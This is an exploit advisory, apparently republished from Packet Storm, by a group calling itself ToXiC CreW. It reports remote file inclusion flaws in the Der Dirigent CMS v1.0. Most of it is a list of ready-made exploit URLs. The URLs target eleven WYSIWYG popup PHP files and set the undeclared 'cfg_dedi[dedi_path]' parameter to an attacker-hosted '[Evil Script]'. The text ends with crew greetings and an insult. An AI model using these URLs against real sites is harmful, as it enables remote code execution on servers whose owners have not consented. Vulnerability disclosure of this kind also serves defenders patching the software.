Der dirigent suffers from multiple remote file inclusion vulnerabilities.
41f533ef1327952b720417045a882b920b2d42b5e89b06bf4d996e5d1d980e22 ###### ToXiC #########################
#
# Der dirigent: Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
# BuG FounD by Drago84
#
# Application Affect:
# Der_dirigent
#
#
# Source Code:
#
http://www.der-dirigent.de/downloads/der_dirigent_v1.0.zip
#
#
# Page:
# insert_line.php
# insert_page.php
# find.php
# fullscreen.php
# changecase.php
# insert_link.php
# insert_marquee.php
# insert_table.php
# table_cellprop.php
# table_prop.php
# table_rowprop.php
#
#
# Problem:
#
# $cfg_dedi['dedi_path'] Not Declare
#
# Dir :
# /backend/external/wysiwyg/popups/
#
#
#
#
#
#
# ExPloit :
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_li
ne.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_pa
ge.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/find.php?
cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/fullscree
n.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/changecas
e.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_li
nk.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/insert_ta
ble.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_cel
lprop.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_pro
p.php?cfg_dedi['dedi_path']=[Evil Script]
#
http://www.site.com/der_PATH/backend/external/wysiwyg/popups/table_row
prop.php?cfg_dedi['dedi_path']=[Evil Script]
#
#
#
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed